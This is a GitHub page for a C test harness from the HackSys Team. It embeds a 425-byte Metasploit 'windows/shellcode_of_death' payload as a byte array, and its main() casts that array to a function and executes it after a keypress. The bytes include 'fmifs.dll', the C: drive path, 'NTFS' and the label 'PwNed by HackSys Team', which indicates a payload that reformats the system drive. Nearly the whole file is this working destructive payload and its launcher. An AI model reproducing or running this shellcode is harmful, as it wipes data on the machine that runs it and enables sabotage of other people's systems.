-
Notifications
You must be signed in to change notification settings - Fork 23
/
Copy pathShellcodeTestMetasploitUnEncoded.c
95 lines (72 loc) · 3.29 KB
/
ShellcodeTestMetasploitUnEncoded.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#include <stdio.h>
#include <string.h>
/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/
http://hacksys.vfreaks.com/
Module Name:
Shellcode Test Encoded
Abstract:
This program is used as a template to test
C style formatted shellcodes. A decoder is
already added to the final shellcode output.
IDE:
Dev-C++ 4.9.9.2 (Windows XP SP3)
Compiler:
gcc 3.4.2
*/
/*
* windows/shellcode_of_death - 425 bytes
* http://www.metasploit.com
* VERBOSE=false, VOLUMELABEL=PwNed by HackSys Team
*/
unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0"
"\xac\xc1\xc3\x05\x01\xc3\x83\xf8\x00\x75\xf3\xc1\xcb\x05\x39"
"\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c\x8b"
"\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3"
"\xff\xff\xff\x5b\x8b\x4b\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25"
"\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83\x8d\x04"
"\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40"
"\x1c\x8b\x50\x08\x8b\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68"
"\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4\x34\x3b\x68"
"\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68"
"\xdc\xdd\x1a\x33\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89\xc2\x59\x51\x8b"
"\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5"
"\xeb\x0f\xe8\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c"
"\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf\x31\xd2\x52\x52\x6a"
"\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3"
"\x50\x83\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52"
"\x52\x68\x20\x00\x09\x00\x50\x8b\x5d\x08\xff\xd3\xff\x74\x24"
"\x04\x8b\x5d\x0c\xff\xd3\x8d\x86\x46\x00\x00\x00\x50\x68\x00"
"\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10"
"\x00\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3"
"\x68\xc8\x00\x00\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff"
"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00"
"\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77\x00"
"\x4e\x00\x65\x00\x64\x00\x20\x00\x62\x00\x79\x00\x20\x00\x48"
"\x00\x61\x00\x63\x00\x6b\x00\x53\x00\x79\x00\x73\x00\x20\x00"
"\x54\x00\x65\x00\x61\x00\x6d\x00\x00\x00\x55\x89\xe5\x31\xc0"
"\x40\x5d\xc2\x0c\x00";
main()
{
int i, badchar_c = 0;
printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);
for(i = 0; i < sizeof(shellcode)-1; ++i) {
if(((unsigned char *)shellcode)[i] == 0x00) {
badchar_c = badchar_c + 1;
}
}
printf("\nNumber of badchar: %d\n\n", badchar_c);
printf("\nPress any key to execute shellcode....\n\n");
getch();
int (*ret)() = (int(*)())shellcode;
ret();
}